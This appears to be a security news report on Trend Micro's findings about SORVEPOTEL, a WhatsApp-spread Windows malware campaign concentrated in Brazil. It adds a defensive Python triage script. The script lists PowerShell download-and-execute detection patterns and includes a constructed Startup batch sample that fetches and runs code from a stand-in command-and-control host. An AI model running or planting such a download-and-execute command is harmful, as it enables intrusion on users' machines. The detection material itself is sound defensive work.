Researchers at Trend Micro have warned of a new self-propagating malware campaign, codenamed SORVEPOTEL, that spreads through the messaging app WhatsApp and targets Windows systems, with most infections concentrated in Brazil.
According to the report, the campaign begins with a phishing message sent from an already compromised WhatsApp contact, which lends it credibility. The message carries a ZIP attachment posing as a receipt or a health app file, and Trend Micro also found the same ZIP files being distributed by email from seemingly legitimate addresses.
If a recipient opens the attachment on a desktop, the ZIP contains a Windows shortcut (LNK) file that launches a PowerShell script to retrieve the main payload from an external server (for example, sorvetenopoate[.]com). The downloaded component is a batch script that copies itself to the Windows Startup folder, so it runs again at every logon, and executes a PowerShell command to contact a command-and-control server for further instructions.
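As an added illustration (not code from Trend Micro's report), the Python triage script below checks for the two artifacts that chain leaves behind: a ZIP that carries a shortcut instead of the document it claims to be, and a batch file in a Startup folder that hands off to PowerShell. The sample ZIPs, file paths, batch contents and the host c2.example.invalid are constructed for the example; the indicator patterns are generic PowerShell download-and-execute idioms, since the report does not quote the campaign's command line.

```python
"""Hunting helpers for the ZIP-lure and Startup-folder stages described above.
All samples are constructed; indicator strings are generic PowerShell
download/exec idioms, not IOCs from the Trend Micro report."""
import io
import re
import zipfile

# Generic PowerShell launcher idioms. Assumption: the report does not quote
# the campaign's exact command line, so these are common patterns, not IOCs.
POWERSHELL_INDICATORS = [
    re.compile(r"\bpowershell(\.exe)?\b", re.I),
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),
    re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"-(e|enc|encodedcommand)\b", re.I),
    re.compile(r"\b(iex|Invoke-Expression|iwr|Invoke-WebRequest|DownloadString|Net\.WebClient)\b", re.I),
]

STARTUP_EXTENSIONS = (".bat", ".cmd")


def suspicious_zip_members(zip_bytes: bytes) -> list[str]:
    """Names of ZIP members that are Windows shortcuts (.lnk).

    A receipt or health-app archive has no reason to contain a shortcut;
    the check also catches double extensions such as 'recibo.pdf.lnk'.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if name.lower().endswith(".lnk")]


def score_startup_batch(content: str) -> tuple[int, list[str]]:
    """Count PowerShell download/exec indicators in a batch script."""
    hits = [p.pattern for p in POWERSHELL_INDICATORS if p.search(content)]
    return len(hits), hits


def triage_startup_folder(files: dict[str, str], threshold: int = 2) -> list[str]:
    """Paths of .bat/.cmd files in a Startup folder meeting the threshold.

    `files` maps path -> content, as gathered by reading both the per-user
    and all-users Startup folders on the host.
    """
    flagged = []
    for path, content in files.items():
        if path.lower().endswith(STARTUP_EXTENSIONS):
            score, _ = score_startup_batch(content)
            if score >= threshold:
                flagged.append(path)
    return flagged


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP (used only to construct the samples below)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# --- Constructed samples (not real artifacts from the campaign) ---
LURE_ZIP = build_zip({"recibo_2024.pdf.lnk": b"L\x00\x00\x00" + b"\x00" * 72})
BENIGN_ZIP = build_zip({"recibo_2024.pdf": b"%PDF-1.4\n%constructed\n"})

STARTUP_DIR = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
MALICIOUS_BAT = STARTUP_DIR + r"\update.bat"
BENIGN_BAT = STARTUP_DIR + r"\printer.bat"
STARTUP_FILES = {
    # Hypothetical C2 host; the campaign's real server name is not used here.
    MALICIOUS_BAT: (
        "@echo off\r\n"
        "powershell -w hidden -ep bypass -c "
        "\"iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/next')\"\r\n"
    ),
    BENIGN_BAT: '@echo off\r\nstart "" "C:\\Program Files\\Printer\\monitor.exe"\r\n',
    STARTUP_DIR + r"\OneDrive.lnk": "",  # shortcuts in Startup are normal; not scored
}

if __name__ == "__main__":
    print("lure ZIP shortcut members:", suspicious_zip_members(LURE_ZIP))
    print("benign ZIP shortcut members:", suspicious_zip_members(BENIGN_ZIP))
    for path in STARTUP_FILES:
        print(path, score_startup_batch(STARTUP_FILES[path]))
    print("flagged:", triage_startup_folder(STARTUP_FILES))
```

The scoring is deliberately threshold-based rather than matching on a single string: a lone `powershell` in a Startup batch file is common in legitimate admin scripts, while a hidden window plus an execution-policy bypass plus a download cmdlet in the same file is the combination worth pulling for analysis.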
The malware contains a propagation routine that, if it detects WhatsApp Web is active on the infected machine, automatically sends the malicious ZIP to the victim’s contacts and groups. Trend Micro said this automated spreading produces high volumes of spam and frequently results in account suspensions for violating WhatsApp’s terms of service.
Trend Micro reported 477 cases overall, 457 of them in Brazil, affecting organisations across government, public service, manufacturing, technology, education and construction. The researchers noted that the campaign appears engineered for speed and propagation rather than for data theft or ransomware, and that because the lure (an LNK file) only executes on a desktop, not on a phone, the operators appear to be targeting enterprise users.